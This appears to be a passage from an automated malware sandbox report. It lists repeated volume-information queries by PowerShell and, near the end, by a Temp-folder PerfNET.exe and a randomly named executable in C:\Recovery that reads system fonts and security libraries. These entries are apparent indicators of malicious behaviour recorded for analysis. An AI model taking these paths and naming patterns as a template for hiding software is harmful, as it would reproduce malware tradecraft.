                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
